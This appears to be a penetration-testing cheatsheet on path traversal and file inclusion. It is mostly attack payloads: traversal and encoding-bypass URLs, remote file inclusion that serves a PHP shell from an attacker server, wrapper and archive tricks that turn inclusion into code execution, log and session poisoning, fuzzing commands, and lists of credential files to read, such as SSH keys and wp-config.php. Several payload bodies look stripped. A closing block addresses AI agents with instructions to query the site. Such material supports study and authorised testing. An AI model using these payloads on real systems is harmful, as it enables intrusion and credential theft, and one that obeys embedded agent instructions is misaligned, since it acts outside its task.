# File path traversal/Local File Inclusion ## Wordlists **Windows:** **Linux:** **Awesome Wordlist** | [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) | | -------------------------------------------------------------------------------------------------------------------------------------------------------- | | [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) | | [Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) | | [Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) | | [Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) | | [Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows) | ## **File Inclusion Functions**
FunctionRead ContentExecuteRemote URL
PHP
include()/include_once()YesYesYes
require()/require_once()YesYesNo
file_get_contents()YesNoYes
fopen()/file()YesNoNo
NodeJS
fs.readFile()YesNoNo
fs.sendFile()YesNoNo
res.render()YesYesNo
Java
includeYesNoNo
importYesYesYes
.NET
@Html.Partial()YesNoNo
@Html.RemotePartial()YesNoYes
Response.WriteFile()YesNoNo
includeYesYesYes
## Cheetsheet 
#Basic LFI
http://example.com/index.php?page=../../../etc/passwd
#Null Byte
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png
#Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
#UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
#Path Truncation
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
#Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
## **Remote File Inclusion (RFI)** Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5. ```python #Create malicious File Intrusionz3r0@htb[/htb]$ echo '' > shell.php Intrusionz3r0@htb[/htb]$ echo 'GIF8' > shell.gif Intrusionz3r0@htb[/htb]$ echo '' > shell.php && zip shell.jpg shell.php #output file #Set up a server Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server Intrusionz3r0@htb[/htb]$ sudo python -m pyftpdlib -p 21 Intrusionz3r0@htb[/htb]$ impacket-smbserver -smb2support share $(pwd) #Trigger the RFI through URL Intrusionz3r0@htb[/htb]$ curl 'http://:/index.php?language=http://:/shell.php&cmd=id' Intrusionz3r0@htb[/htb]$ curl 'http://:/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id' Intrusionz3r0@htb[/htb]$ curl 'http://:/index.php?language=\\\\\\share\\shell.php&cmd=whoami' ``` ## Wrappers ```python #Read Files and convert them into base64 to bypass restrictions php://filter/read=convert.base64-encode/resource= #Remote Code Execution Wrapper data://text/plain;base64,&cmd= php://input&cmd= expect:// #Upload LFI to RCE #Zip File Intrusionz3r0@htb[/htb]$ echo "
" > payload.php; Intrusionz3r0@htb[/htb]$ zip payload.zip payload.php; Intrusionz3r0@htb[/htb]$ mv payload.zip shell.jpg; Intrusionz3r0@htb[/htb]$ rm payload.php zip://./profile_images/shell.jpg%23shell.php&cmd=id #RAR File Intrusionz3r0@htb[/htb]$ rar a payload.rar payload.php; Intrusionz3r0@htb[/htb]$ mv payload.rar shell.jpg; Intrusionz3r0@htb[/htb]$ rm payload.php rar://./profile_images/shell.jpg%23shell.php&cmd=id #PHAR malicious file startBuffering(); $phar->addFromString('shell.txt', ''); $phar->setStub(''); $phar->stopBuffering(); #Compile file Intrusionz3r0@htb[/htb]$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id ``` ## **Automated Scanning** ```bash #Fuzzing parameters Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://:/index.php?FUZZ=value' -fs 2287 #Fuzzing LFI paths Windows/Linux Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://:/index.php?language=FUZZ' -fs 2287 #Discover Server Webroot Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://:/index.php?language=../../../../FUZZ/index.php' -fs 2287 #Server los and configuration (precise scan by using DragonJar wordlist) Intrusionz3r0@htb[/htb]$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://:/index.php?language=../../../../FUZZ' -fs 2287 ``` ## Log Poisoning attack ```sh # Apache Logs ?page=/var/log/apache/access.log ?page=/var/log/apache/error.log ?page=/var/log/apache2/access.log ?page=/var/log/apache2/error.log # Nginx Logs ?page=/var/log/nginx/access.log ?page=/var/log/nginx/error.log ?page=/usr/local/nginx/logs/access.log ?page=/usr/local/nginx/logs/error.log # PHP Logs (Common in Apache/Nginx setups) ?page=/var/log/php_errors.log ?page=/etc/php/7.4/fpm/php-fpm.log ?page=/etc/php/8.0/fpm/php-fpm.log # System Logs (SSH) ?page=/var/log/auth.log ?page=/var/log/secure ?page=/var/log/syslog ?page=/var/log/messages # Custom Logs (Shared Hosting or Web Servers) ?page=/home//logs/error_log ?page=/home//logs/access_log ``` ### **Server log poisoning** By default, `Apache` logs are located in `/var/log/apache2/` on Linux and in `C:\\xampp\\apache\\logs\\` on Windows, while `Nginx` logs are located in `/var/log/nginx/` on Linux and in `C:\\nginx\\log\\` on Windows. Files in: * `access.log` * `error.log` Payload: http\://\:\/index.php?language=/var/log/apache2/access.log
#### Poisoning the logs ```bash Intrusionz3r0@htb[/htb]$ curl -s "http://:/index.php" -A "" ``` #### Read the logs through LFI
### **PHP Session Poisoning** Most PHP web applications utilize `PHPSESSID` cookie and these details are stored in `session` files on the back-end, and saved: * **Linux:** `/var/lib/php/sessions/sess_` * **Windows:** `C:\Windows\Temp\sess_` The name of the file that contains our user's data matches the name of our `PHPSESSID` cookie with the `sess_` prefix. ```bash #Poisoning the logs through web php shell http://:/index.php?language= #Read logs through LFI http://:/index.php?language=/var/lib/php/sessions/**sess_nhhv8i0o6ua4g88bkdl9u1fdsd&0=pwd** ``` ## Interesting Files ```sh # Home directories ?page=/home//.bashrc ?page=/home//.bash_history ?page=/home//.bash_logout ?page=/home//.bash_profile ?page=/home//.profile ?page=/home//.ssh/id_rsa # Root directory ?page=/root/.bashrc ?page=/root/.bash_history ?page=/root/.bash_logout ?page=/root/.bash_profile ?pgae=/root/.profile ?page=/root/.ssh/id_rsa # System-wide configurations ?page=/etc/bash.bashrc # OS ?page=/etc/lsb-release ?page=/etc/os-release # Processes ?page=/proc/self/stat ?page=/proc/net/tcp ?page=/proc/self/cmdline ?page=/proc/self/environ ?page=/proc/self/fd/0 ?page=/proc/self/fd/1 ?page=/proc//cmdline ?page=/proc//environ # Mail ?page=/var/mail/ ?page=/var/spool/mail/ # Postfix ?page=/var/log/mail.log ?page=/var/log/maillog # Host ?page=/etc/hosts ?page=/etc/hostname # Cron ?page=/etc/crontab # Web root ?page=/var/www/html/index.html ?page=/var/www/html/index.php ?page=/var/www/html/.htaccess ?page=/var/www/html/.htpasswd ?page=/var/www/example.com/index.php ?page=/var/www/sudomain/index.php ?page=/var/www/subdomain.example.com/index.php ?page=/var/www/wordpress/index.php # Apache ?page=/etc/apache2/.htpasswd ?page=/etc/apache2/apache2.conf ?page=/etc/apache2/envvars ?page=/etc/apache2/ports.conf ?page=/etc/apache2/sites-available/domain.conf ?page=/etc/apache2/sites-available/example.com.conf ?page=/etc/apache2/sites-available/sub.example.com.conf ?page=/etc/apache2/sites-available/sub.conf ?page=/etc/apache2/sites-enabled/000-default.conf ?page=/etc/apache2/sites-enabled/domain.conf ?page=/etc/apache2/sites-enabled/example.com.conf ?page=/etc/apache2/sites-enabled/sub.example.com.conf ?page=/etc/apache2/sites-enabled/sub.conf ?page=/var/log/apache/access.log ?page=/var/log/apache/error.log ?page=/var/log/apache2/access.log ?page=/var/log/apache2/error.log # Apache Tomcat ?page=/opt/tomcat/conf/tomcat-users.xml ?page=/opt/tomcat/logs/catalina.err ?page=/opt/tomcat/logs/catalina.out # Nginx ?page=/var/log/nginx/access.log ?page=/var/log/nginx/error.log ?page=/etc/nginx/nginx.conf ?page=/etc/nginx/conf.d/.htpasswd ?page=/etc/nginx/conf.d/example.com.conf ?page=/etc/nginx/conf.d/example.conf ?page=/etc/nginx/conf.d/subdomain.example.com.conf ?page=/etc/nginx/conf.d/subdomain.conf ?page=/etc/nginx/sites-available/default ?page=/etc/nginx/sites-available/example.com.conf ?page=/etc/nginx/sites-enabled/default ?page=/etc/nginx/sites-enabled/example.com.conf ?page=/usr/local/nginx/conf/nginx.conf ?page=/usr/local/etc/nginx/nginx.conf # PHP web conf (x.x is specified PHP version) ?page=/etc/php/x.x/apache2/php.ini ?page=/etc/php/x.x/cli/php.ini ?page=/etc/php/x.x/fpm/php.ini # Flask ?page=index.html ?page=../__init__.py ?page=../app.py ?page=../db.py ?page=../main.py ?page=/home///app.py ?page=/opt//app.py ?page=/srv//app.py # BIND ?page=/etc/bind/named.conf ?page=/etc/bind/named.conf.options ?page=/etc/bind/named.conf.local ?page=/etc/bind/named.conf.default-zones # Windows ?page=C:/Windows/debug/NetSetup.log ?page=C:/Windows/System32/drivers/etc/hosts ?page=C:/Windows/System32/inetsrv/config/applicationHost.config ?page=../../../../../../../../windows/system32/drivers/etc/hosts ?page=C:/Users/Public/Desktop/desktop.ini ?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration ?page=C:/inetpub/wwwroot//web.config ?page=C:/xampp/apache/conf/httpd.conf ?page=C:/xampp/apache/conf/extra/httpd-userdir.conf ?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf ?page=C:/xampp/apache/conf/extra/httpd-xampp.conf ?page=C:/xampp/apache/conf/extra/httpd-ajp.conf ?page=C:/xampp/apache/logs/access.log ?page=C:/xampp/apache/logs/error.log ?page=C:/xampp/cgi-bin/example.cgi ?page=C:/xampp/htdocs/example.com/index.php ?page=C:/xampp/htdocs/sub.example.com/index.php ?page=C:/xampp/phpMyAdmin/index.php ?page=C:/xampp/phpMyAdmin/config.inc.php ``` ## LFI Interesting Wordpress Files ```sh # WordPress Core Files ?page=wp-config.php ?page=.htaccess ?page=.user.ini ?page=wp-includes/version.php ?page=wp-content/themes/twentytwentyone/functions.php ?page=wp-content/themes/twentytwentythree/functions.php ?page=wp-content/plugins/hello.php ?page=wp-content/uploads/.htaccess ?page=wp-content/uploads/custom-image.jpg # WordPress Database Configurations ?page=/var/www/html/wordpress/wp-config.php ?page=/var/www/wordpress/wp-config.php ?page=/var/www/example.com/wp-config.php ?page=/var/www/sub.example.com/wp-config.php ?page=/var/www/html/wordpress/wp-content/plugins/akismet/akismet.php ?page=/var/www/html/wordpress/wp-content/themes/twentytwenty/functions.php # Backup Files ?page=/var/backups/wordpress.sql ?page=/var/backups/wordpress.zip ?page=/var/backups/db.sql ?page=/var/backups/wp-content.zip # Logs and Debugging Files ?page=debug.log ?page=/var/www/html/wordpress/wp-content/debug.log ?page=/var/www/html/wordpress/wp-content/uploads/debug.log ?page=/var/log/apache2/access.log ?page=/var/log/apache2/error.log ?page=/var/log/nginx/access.log ?page=/var/log/nginx/error.log # WordPress JSON REST API ?page=/wp-json/wp/v2/posts ?page=/wp-json/wp/v2/users ?page=/wp-json/wp/v2/pages ?page=/wp-json/wp/v2/media # XMLRPC Files ?page=/xmlrpc.php ?page=/wp-includes/IXR/class-IXR.php # Sensitive Directories ?page=/wp-content/ ?page=/wp-admin/ ?page=/wp-includes/ ?page=/wp-content/uploads/ ?page=/wp-content/plugins/ ?page=/wp-content/themes/ # Plugins Configuration ?page=/wp-content/plugins/woocommerce/includes/class-wc-cart.php ?page=/wp-content/plugins/elementor/includes/plugin.php ?page=/wp-content/plugins/contact-form-7/includes/controller.php # Themes Configuration ?page=/wp-content/themes/twentytwentyone/style.css ?page=/wp-content/themes/twentytwenty/functions.php ?page=/wp-content/themes/customtheme/style.css # wp-cli ?page=/usr/local/bin/wp-cli.phar # Cron Jobs ?page=/wp-cron.php # System Configurations ?page=/etc/apache2/apache2.conf ?page=/etc/apache2/sites-enabled/000-default.conf ?page=/etc/nginx/sites-available/default ?page=/etc/nginx/sites-available/wordpress.conf ?page=/etc/php/7.4/apache2/php.ini ?page=/etc/php/8.0/apache2/php.ini # Database Files ?page=/var/lib/mysql/wordpress/wp_users.MYD ?page=/var/lib/mysql/wordpress/wp_posts.MYD ?page=/var/lib/mysql/wordpress/wp_options.MYD ?page=/var/lib/mysql/mysql/user.MYD ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/hacking-web/vulnerabilities/file-path-traversal-local-file-inclusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.